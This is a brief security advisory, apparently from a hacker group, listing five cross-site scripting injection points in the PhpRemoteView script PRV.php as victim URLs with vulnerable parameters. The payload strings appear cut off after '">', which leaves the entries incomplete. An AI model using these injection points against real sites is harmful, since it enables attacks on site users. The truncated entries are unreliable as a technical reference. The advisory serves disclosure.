|
---------------------------------------------=0D
PhpRemoteView Multiple Xss Vulnerabilities=0D
---------------------------------------------=0D
=0D
Site:=0D
=0D
http://php.spb.ru/remview/ =0D
=0D
Bug:=0D
=0D
1- =0D">http://victim/path/PRV.php?&c=v&d=[path]&f=">=0D
=0D
2- =0D">http://victim/path/PRV.php?c=l&d=">=0D
=0D
3-=0D
=0D">http://victim/path/PRV.php?c=setup&ref=">=0D
=0D
4-http://victim/path/PRV.php?c=d&d=[path]=0D
MAKE DIR (type full path) : ">=0D
=0D
5-http://victim/path/PRV.php?c=d&d=[path]=0D
Full file name : ">=0D
=0D
---------------------------------------------=0D
Source :=0D
http://soot.shabgard.org/bugs/phpremoteview.txt=0D
=0D
Credit :=0D
Soot =0D
Shabgard Security Team=0D
http://www.shabgard.org =0D
=0D
Greetz : =0D
Hregy,Elite,Bl2k,Littlehacker=0D
---------------------------------------------=0D